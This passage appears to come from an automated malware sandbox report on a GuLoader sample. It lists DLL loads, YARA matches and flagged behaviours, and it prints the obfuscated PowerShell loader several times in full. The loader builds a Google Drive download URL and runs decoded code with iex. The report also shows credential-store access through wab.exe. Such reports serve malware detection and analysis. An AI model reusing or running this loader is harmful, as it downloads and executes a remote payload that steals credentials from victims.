            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007872000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000009.00000002.2010987312.0000000007807000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000009.00000002.2003068899.0000000003320000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL.exe", ""$Klervske = 1;$Hengivnes='Substrin';$H", "", "", "0");
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2017391660.0000000009585000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2007819028.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Trflerne $Memory $Gyratorkoblede), (Underlagt @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tikkenes = [AppDomain]::CurrentDomain.GetAssemblies()$global:
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sweepsteaket)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Blennophthalmia82, $false).DefineType($Wrapp
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nazaritism)$global:Overslack = [System.Text.Encoding]::ASCII.GetString($Vvets)$global:Burnfire=$Overslack.substring(305706,29961)<#Projektgruppe Hundrede Constraints Nonterritorially
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF886E40952 push E95B7BD0h; ret 3_2_00007FF886E409C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B70638 push eax; mov dword ptr [esp], ecx9_2_07B70AC4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF8039 pushfd ; retn 0027h12_2_02EF803A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF0CB5 push edi; ret 12_2_02EF0CC2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_02EF0C93 push edi; retf 12_2_02EF0C3A
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
